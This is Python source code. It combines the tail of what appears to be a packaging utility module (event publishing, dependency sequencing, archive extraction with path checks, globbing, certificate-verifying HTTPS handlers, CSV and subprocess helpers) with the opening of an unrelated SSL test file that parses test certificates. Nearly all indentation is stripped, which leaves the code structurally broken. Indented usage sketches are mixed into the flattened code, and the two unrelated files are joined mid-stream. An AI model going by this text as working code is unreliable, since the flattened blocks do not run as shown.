raise ValueError("No subscribers: %r" % event)
subs[event].remove(subscriber)
def get_subscribers(self, event):
"""
Return an iterator for the subscribers for an event.
:param event: The event to return subscribers for.
"""
return iter(self._subscribers.get(event, ()))
def publish(self, event, *args, **kwargs):
"""
Publish a event and return a list of values returned by its
subscribers.
:param event: The event to publish.
:param args: The positional arguments to pass to the event's
subscribers.
:param kwargs: The keyword arguments to pass to the event's
subscribers.
"""
result = []
for subscriber in self.get_subscribers(event):
try:
value = subscriber(event, *args, **kwargs)
except Exception:
logger.exception("Exception during event publication")
value = None
result.append(value)
logger.debug(
"publish %s: args = %s, kwargs = %s, result = %s",
event,
args,
kwargs,
result,
)
return result
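# Minimal illustration of the publish/subscribe flow (a sketch; the subclass
# and subscriber below exist only for this example):
#
#     class Notifier(EventMixin):
#         pass
#
#     def on_saved(event, path):
#         return 'saved %s' % path
#
#     n = Notifier()
#     n.add('saved', on_saved)
#     n.publish('saved', '/tmp/example.txt')  # -> ['saved /tmp/example.txt']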
#
# Simple sequencing
#
class Sequencer(object):
def __init__(self):
self._preds = {}
self._succs = {}
self._nodes = set() # nodes with no preds/succs
def add_node(self, node):
self._nodes.add(node)
def remove_node(self, node, edges=False):
if node in self._nodes:
self._nodes.remove(node)
if edges:
for p in set(self._preds.get(node, ())):
self.remove(p, node)
for s in set(self._succs.get(node, ())):
self.remove(node, s)
# Remove empties
for k, v in list(self._preds.items()):
if not v:
del self._preds[k]
for k, v in list(self._succs.items()):
if not v:
del self._succs[k]
def add(self, pred, succ):
assert pred != succ
self._preds.setdefault(succ, set()).add(pred)
self._succs.setdefault(pred, set()).add(succ)
def remove(self, pred, succ):
assert pred != succ
try:
preds = self._preds[succ]
succs = self._succs[pred]
except KeyError: # pragma: no cover
raise ValueError("%r not a successor of anything" % succ)
try:
preds.remove(pred)
succs.remove(succ)
except KeyError: # pragma: no cover
raise ValueError("%r not a successor of %r" % (succ, pred))
def is_step(self, step):
return step in self._preds or step in self._succs or step in self._nodes
def get_steps(self, final):
if not self.is_step(final):
raise ValueError("Unknown: %r" % final)
result = []
todo = []
seen = set()
todo.append(final)
while todo:
step = todo.pop(0)
if step in seen:
# if a step was already seen,
# move it to the end (so it will appear earlier
# when reversed on return) ... but not for the
# final step, as that would be confusing for
# users
if step != final:
result.remove(step)
result.append(step)
else:
seen.add(step)
result.append(step)
preds = self._preds.get(step, ())
todo.extend(preds)
return reversed(result)
@property
def strong_connections(self):
# http://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm
index_counter = [0]
stack = []
lowlinks = {}
index = {}
result = []
graph = self._succs
def strongconnect(node):
# set the depth index for this node to the smallest unused index
index[node] = index_counter[0]
lowlinks[node] = index_counter[0]
index_counter[0] += 1
stack.append(node)
# Consider successors
try:
successors = graph[node]
except Exception:
successors = []
for successor in successors:
if successor not in lowlinks:
# Successor has not yet been visited
strongconnect(successor)
lowlinks[node] = min(lowlinks[node], lowlinks[successor])
elif successor in stack:
# the successor is in the stack and hence in the current
# strongly connected component (SCC)
lowlinks[node] = min(lowlinks[node], index[successor])
# If `node` is a root node, pop the stack and generate an SCC
if lowlinks[node] == index[node]:
connected_component = []
while True:
successor = stack.pop()
connected_component.append(successor)
if successor == node:
break
component = tuple(connected_component)
# storing the result
result.append(component)
for node in graph:
if node not in lowlinks:
strongconnect(node)
return result
@property
def dot(self):
result = ["digraph G {"]
for succ in self._preds:
preds = self._preds[succ]
for pred in preds:
result.append(" %s -> %s;" % (pred, succ))
for node in self._nodes:
result.append(" %s;" % node)
result.append("}")
return "\n".join(result)
#
# Unarchiving functionality for zip, tar, tgz, tbz, whl
#
ARCHIVE_EXTENSIONS = (".tar.gz", ".tar.bz2", ".tar", ".zip", ".tgz", ".tbz", ".whl")
def unarchive(archive_filename, dest_dir, format=None, check=True):
def check_path(path):
if not isinstance(path, text_type):
path = path.decode("utf-8")
p = os.path.abspath(os.path.join(dest_dir, path))
if not p.startswith(dest_dir) or p[plen] != os.sep:
raise ValueError("path outside destination: %r" % p)
dest_dir = os.path.abspath(dest_dir)
plen = len(dest_dir)
archive = None
if format is None:
if archive_filename.endswith((".zip", ".whl")):
format = "zip"
elif archive_filename.endswith((".tar.gz", ".tgz")):
format = "tgz"
mode = "r:gz"
elif archive_filename.endswith((".tar.bz2", ".tbz")):
format = "tbz"
mode = "r:bz2"
elif archive_filename.endswith(".tar"):
format = "tar"
mode = "r"
else: # pragma: no cover
raise ValueError("Unknown format for %r" % archive_filename)
try:
if format == "zip":
archive = ZipFile(archive_filename, "r")
if check:
names = archive.namelist()
for name in names:
check_path(name)
else:
archive = tarfile.open(archive_filename, mode)
if check:
names = archive.getnames()
for name in names:
check_path(name)
if format != "zip" and sys.version_info[0] < 3:
# See Python issue 17153. If the dest path contains Unicode,
# tarfile extraction fails on Python 2.x if a member path name
# contains non-ASCII characters - it leads to an implicit
# bytes -> unicode conversion using ASCII to decode.
for tarinfo in archive.getmembers():
if not isinstance(tarinfo.name, text_type):
tarinfo.name = tarinfo.name.decode("utf-8")
archive.extractall(dest_dir)
finally:
if archive:
archive.close()
def zip_dir(directory):
"""zip a directory tree into a BytesIO object"""
result = io.BytesIO()
dlen = len(directory)
with ZipFile(result, "w") as zf:
for root, dirs, files in os.walk(directory):
for name in files:
full = os.path.join(root, name)
rel = root[dlen:]
dest = os.path.join(rel, name)
zf.write(full, dest)
return result
#
# Simple progress bar
#
UNITS = ("", "K", "M", "G", "T", "P")
class Progress(object):
unknown = "UNKNOWN"
def __init__(self, minval=0, maxval=100):
assert maxval is None or maxval >= minval
self.min = self.cur = minval
self.max = maxval
self.started = None
self.elapsed = 0
self.done = False
def update(self, curval):
assert self.min <= curval
assert self.max is None or curval <= self.max
self.cur = curval
now = time.time()
if self.started is None:
self.started = now
else:
self.elapsed = now - self.started
def increment(self, incr):
assert incr >= 0
self.update(self.cur + incr)
def start(self):
self.update(self.min)
return self
def stop(self):
if self.max is not None:
self.update(self.max)
self.done = True
@property
def maximum(self):
return self.unknown if self.max is None else self.max
@property
def percentage(self):
if self.done:
result = "100 %"
elif self.max is None:
result = " ?? %"
else:
v = 100.0 * (self.cur - self.min) / (self.max - self.min)
result = "%3d %%" % v
return result
def format_duration(self, duration):
if (duration <= 0) and self.max is None or self.cur == self.min:
result = "??:??:??"
# elif duration < 1:
# result = '--:--:--'
else:
result = time.strftime("%H:%M:%S", time.gmtime(duration))
return result
@property
def ETA(self):
if self.done:
prefix = "Done"
t = self.elapsed
# import pdb; pdb.set_trace()
else:
prefix = "ETA "
if self.max is None:
t = -1
elif self.elapsed == 0 or (self.cur == self.min):
t = 0
else:
# import pdb; pdb.set_trace()
t = float(self.max - self.min)
t /= self.cur - self.min
t = (t - 1) * self.elapsed
return "%s: %s" % (prefix, self.format_duration(t))
@property
def speed(self):
if self.elapsed == 0:
result = 0.0
else:
result = (self.cur - self.min) / self.elapsed
for unit in UNITS:
if result < 1000:
break
result /= 1000.0
return "%d %sB/s" % (result, unit)
#
# Glob functionality
#
RICH_GLOB = re.compile(r"\{([^}]*)\}")
_CHECK_RECURSIVE_GLOB = re.compile(r"[^/\\,{]\*\*|\*\*[^/\\,}]")
_CHECK_MISMATCH_SET = re.compile(r"^[^{]*\}|\{[^}]*$")
def iglob(path_glob):
"""Extended globbing function that supports ** and {opt1,opt2,opt3}."""
if _CHECK_RECURSIVE_GLOB.search(path_glob):
msg = """invalid glob %r: recursive glob "**" must be used alone"""
raise ValueError(msg % path_glob)
if _CHECK_MISMATCH_SET.search(path_glob):
msg = """invalid glob %r: mismatching set marker '{' or '}'"""
raise ValueError(msg % path_glob)
return _iglob(path_glob)
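# Examples of the extended glob syntax accepted above (the paths themselves
# are hypothetical); both calls return generators of matching paths:
#
#     iglob('src/**/*.py')             # recursive: every .py file under src/
#     iglob('docs/{api,guide}/*.rst')  # set expansion: docs/api/*.rst and docs/guide/*.rst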
def _iglob(path_glob):
rich_path_glob = RICH_GLOB.split(path_glob, 1)
if len(rich_path_glob) > 1:
assert len(rich_path_glob) == 3, rich_path_glob
prefix, set, suffix = rich_path_glob
for item in set.split(","):
for path in _iglob("".join((prefix, item, suffix))):
yield path
else:
if "**" not in path_glob:
for item in std_iglob(path_glob):
yield item
else:
prefix, radical = path_glob.split("**", 1)
if prefix == "":
prefix = "."
if radical == "":
radical = "*"
else:
# we support both
radical = radical.lstrip("/")
radical = radical.lstrip("\\")
for path, dir, files in os.walk(prefix):
path = os.path.normpath(path)
for fn in _iglob(os.path.join(path, radical)):
yield fn
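# --- Illustrative usage sketch (not part of the original module) ---
# iglob() combines {a,b} alternation with the recursive "**" pattern; the
# pattern and helper name below are hypothetical.
def _iglob_demo():
    """Return every .txt and .rst file anywhere under docs/ or examples/."""
    return sorted(iglob('{docs,examples}/**/*.{txt,rst}'))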
if ssl:
from .compat import (
HTTPSHandler as BaseHTTPSHandler,
match_hostname,
CertificateError,
)
#
# HTTPSConnection which verifies certificates/matches domains
#
class HTTPSConnection(httplib.HTTPSConnection):
ca_certs = None # set this to the path to the certs file (.pem)
check_domain = True # only used if ca_certs is not None
# noinspection PyPropertyAccess
def connect(self):
sock = socket.create_connection((self.host, self.port), self.timeout)
if getattr(self, "_tunnel_host", False):
self.sock = sock
self._tunnel()
if not hasattr(ssl, "SSLContext"):
# For 2.x
if self.ca_certs:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
self.sock = ssl.wrap_socket(
sock,
self.key_file,
self.cert_file,
cert_reqs=cert_reqs,
ssl_version=ssl.PROTOCOL_SSLv23,
ca_certs=self.ca_certs,
)
else: # pragma: no cover
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.options |= ssl.OP_NO_SSLv2
if self.cert_file:
context.load_cert_chain(self.cert_file, self.key_file)
kwargs = {}
if self.ca_certs:
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(cafile=self.ca_certs)
if getattr(ssl, "HAS_SNI", False):
kwargs["server_hostname"] = self.host
self.sock = context.wrap_socket(sock, **kwargs)
if self.ca_certs and self.check_domain:
try:
match_hostname(self.sock.getpeercert(), self.host)
logger.debug("Host verified: %s", self.host)
except CertificateError: # pragma: no cover
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
raise
class HTTPSHandler(BaseHTTPSHandler):
def __init__(self, ca_certs, check_domain=True):
BaseHTTPSHandler.__init__(self)
self.ca_certs = ca_certs
self.check_domain = check_domain
def _conn_maker(self, *args, **kwargs):
"""
This is called to create a connection instance. Normally you'd
pass a connection class to do_open, but it doesn't actually check for
a class, and just expects a callable. As long as we behave just as a
constructor would have, we should be OK. If it ever changes so that
we *must* pass a class, we'll create an UnsafeHTTPSConnection class
which just sets check_domain to False in the class definition, and
choose which one to pass to do_open.
"""
result = HTTPSConnection(*args, **kwargs)
if self.ca_certs:
result.ca_certs = self.ca_certs
result.check_domain = self.check_domain
return result
def https_open(self, req):
try:
return self.do_open(self._conn_maker, req)
except URLError as e:
if "certificate verify failed" in str(e.reason):
raise CertificateError(
"Unable to verify server certificate " "for %s" % req.host
)
else:
raise
#
# To prevent mixing HTTP traffic with HTTPS (examples: a Man-In-The-
# Middle proxy using HTTP listens on port 443, or an index mistakenly serves
# HTML containing an http://xyz link when it should be https://xyz),
# you can use the following handler class, which does not allow HTTP traffic.
#
# It works by inheriting from HTTPHandler - so build_opener won't add a
# handler for HTTP itself.
#
class HTTPSOnlyHandler(HTTPSHandler, HTTPHandler):
def http_open(self, req):
raise URLError(
"Unexpected HTTP request on what should be a secure "
"connection: %s" % req
)
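# --- Illustrative usage sketch (not part of the original module) ---
# A verifying opener might be assembled like this; the CA bundle path is
# hypothetical, and HTTPSOnlyHandler additionally rejects plain-HTTP requests:
#
#     from urllib.request import build_opener          # Python 3
#     handler = HTTPSOnlyHandler('/path/to/ca-bundle.pem', check_domain=True)
#     opener = build_opener(handler)
#     opener.open('https://example.com/simple/')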
#
# XML-RPC with timeouts
#
_ver_info = sys.version_info[:2]
if _ver_info == (2, 6):
class HTTP(httplib.HTTP):
def __init__(self, host="", port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
if ssl:
class HTTPS(httplib.HTTPS):
def __init__(self, host="", port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
class Transport(xmlrpclib.Transport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.Transport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, x509 = self.get_host_info(host)
if _ver_info == (2, 6):
result = HTTP(h, timeout=self.timeout)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPConnection(h)
result = self._connection[1]
return result
if ssl:
class SafeTransport(xmlrpclib.SafeTransport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.SafeTransport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, kwargs = self.get_host_info(host)
if not kwargs:
kwargs = {}
kwargs["timeout"] = self.timeout
if _ver_info == (2, 6):
result = HTTPS(host, None, **kwargs)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPSConnection(h, None, **kwargs)
result = self._connection[1]
return result
class ServerProxy(xmlrpclib.ServerProxy):
def __init__(self, uri, **kwargs):
self.timeout = timeout = kwargs.pop("timeout", None)
# The above classes only come into play if a timeout
# is specified
if timeout is not None:
scheme, _ = splittype(uri)
use_datetime = kwargs.get("use_datetime", 0)
if scheme == "https":
tcls = SafeTransport
else:
tcls = Transport
kwargs["transport"] = t = tcls(timeout, use_datetime=use_datetime)
self.transport = t
xmlrpclib.ServerProxy.__init__(self, uri, **kwargs)
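# --- Illustrative usage sketch (not part of the original module) ---
# Passing timeout= switches ServerProxy to the timeout-aware transports
# defined above; the endpoint URL below is hypothetical.
def _xmlrpc_demo():
    """Create an XML-RPC proxy whose socket operations time out after 10s."""
    proxy = ServerProxy('http://localhost:8000/RPC2', timeout=10.0)
    return proxy.system.listMethods()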
#
# CSV functionality. This is provided because on 2.x, the csv module can't
# handle Unicode. However, we need to deal with Unicode in e.g. RECORD files.
#
def _csv_open(fn, mode, **kwargs):
if sys.version_info[0] < 3:
mode += "b"
else:
kwargs["newline"] = ""
# Python 3 determines encoding from locale. Force 'utf-8'
# file encoding to match other forced utf-8 encoding
kwargs["encoding"] = "utf-8"
return open(fn, mode, **kwargs)
class CSVBase(object):
defaults = {
"delimiter": str(","), # The strs are used because we need native
"quotechar": str('"'), # str in the csv API (2.x won't take
"lineterminator": str("\n"), # Unicode)
}
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.stream.close()
class CSVReader(CSVBase):
def __init__(self, **kwargs):
if "stream" in kwargs:
stream = kwargs["stream"]
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader("utf-8")(stream)
self.stream = stream
else:
self.stream = _csv_open(kwargs["path"], "r")
self.reader = csv.reader(self.stream, **self.defaults)
def __iter__(self):
return self
def next(self):
result = next(self.reader)
if sys.version_info[0] < 3:
for i, item in enumerate(result):
if not isinstance(item, text_type):
result[i] = item.decode("utf-8")
return result
__next__ = next
class CSVWriter(CSVBase):
def __init__(self, fn, **kwargs):
self.stream = _csv_open(fn, "w")
self.writer = csv.writer(self.stream, **self.defaults)
def writerow(self, row):
if sys.version_info[0] < 3:
r = []
for item in row:
if isinstance(item, text_type):
item = item.encode("utf-8")
r.append(item)
row = r
self.writer.writerow(row)
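# --- Illustrative usage sketch (not part of the original module) ---
# Round-trip a couple of RECORD-style rows through the UTF-8 aware CSV helpers
# above; the file name and hash values are hypothetical.
def _csv_demo(path='RECORD.example'):
    """Write two rows with CSVWriter, then read them back with CSVReader."""
    rows = [('distlib/util.py', 'sha256=AAAA', '12345'),
            ('distlib/__init__.py', 'sha256=BBBB', '678')]
    with CSVWriter(path) as writer:
        for row in rows:
            writer.writerow(row)
    with CSVReader(path=path) as reader:
        return [row for row in reader]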
#
# Configurator functionality
#
class Configurator(BaseConfigurator):
value_converters = dict(BaseConfigurator.value_converters)
value_converters["inc"] = "inc_convert"
def __init__(self, config, base=None):
super(Configurator, self).__init__(config)
self.base = base or os.getcwd()
def configure_custom(self, config):
def convert(o):
if isinstance(o, (list, tuple)):
result = type(o)([convert(i) for i in o])
elif isinstance(o, dict):
if "()" in o:
result = self.configure_custom(o)
else:
result = {}
for k in o:
result[k] = convert(o[k])
else:
result = self.convert(o)
return result
c = config.pop("()")
if not callable(c):
c = self.resolve(c)
props = config.pop(".", None)
# Check for valid identifiers
args = config.pop("[]", ())
if args:
args = tuple([convert(o) for o in args])
items = [(k, convert(config[k])) for k in config if valid_ident(k)]
kwargs = dict(items)
result = c(*args, **kwargs)
if props:
for n, v in props.items():
setattr(result, n, convert(v))
return result
def __getitem__(self, key):
result = self.config[key]
if isinstance(result, dict) and "()" in result:
self.config[key] = result = self.configure_custom(result)
return result
def inc_convert(self, value):
"""Default converter for the inc:// protocol."""
if not os.path.isabs(value):
value = os.path.join(self.base, value)
with codecs.open(value, "r", encoding="utf-8") as f:
result = json.load(f)
return result
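# --- Illustrative usage sketch (not part of the original module) ---
# A Configurator instantiates any dict that carries a "()" key naming a
# callable; "[]" supplies positional arguments and "." sets attributes on the
# result.  String values of the form 'inc://relative.json' are replaced by the
# parsed contents of that JSON file, resolved against `base`.  Everything in
# the snippet below is hypothetical:
#
#     cfg = Configurator({'handler': {'()': 'logging.StreamHandler',
#                                     '.': {'terminator': ''}}},
#                        base='/etc/myapp')
#     handler = cfg['handler']      # -> a configured logging.StreamHandler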
class SubprocessMixin(object):
"""
Mixin for running subprocesses and capturing their output
"""
def __init__(self, verbose=False, progress=None):
self.verbose = verbose
self.progress = progress
def reader(self, stream, context):
"""
Read lines from a subprocess' output stream and either pass to a progress
callable (if specified) or write progress information to sys.stderr.
"""
progress = self.progress
verbose = self.verbose
while True:
s = stream.readline()
if not s:
break
if progress is not None:
progress(s, context)
else:
if not verbose:
sys.stderr.write(".")
else:
sys.stderr.write(s.decode("utf-8"))
sys.stderr.flush()
stream.close()
def run_command(self, cmd, **kwargs):
p = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, **kwargs
)
t1 = threading.Thread(target=self.reader, args=(p.stdout, "stdout"))
t1.start()
t2 = threading.Thread(target=self.reader, args=(p.stderr, "stderr"))
t2.start()
p.wait()
t1.join()
t2.join()
if self.progress is not None:
self.progress("done.", "main")
elif self.verbose:
sys.stderr.write("done.\n")
return p
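# --- Illustrative usage sketch (not part of the original module) ---
# SubprocessMixin is meant to be mixed into a class that shells out; the
# subclass name and command below are hypothetical.
class _PipInstaller(SubprocessMixin):
    """Run a command, streaming dots (or full output when verbose) to stderr."""
    def install(self, requirement):
        return self.run_command([sys.executable, '-m', 'pip', 'install',
                                 requirement])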
def normalize_name(name):
"""Normalize a python package name a la PEP 503"""
# https://www.python.org/dev/peps/pep-0503/#normalized-names
return re.sub("[-_.]+", "-", name).lower()
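# Hypothetical example of the normalization above:
#   normalize_name('Django_Rest.Framework')  ->  'django-rest-framework'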
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
ssl = support.import_module("ssl")
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
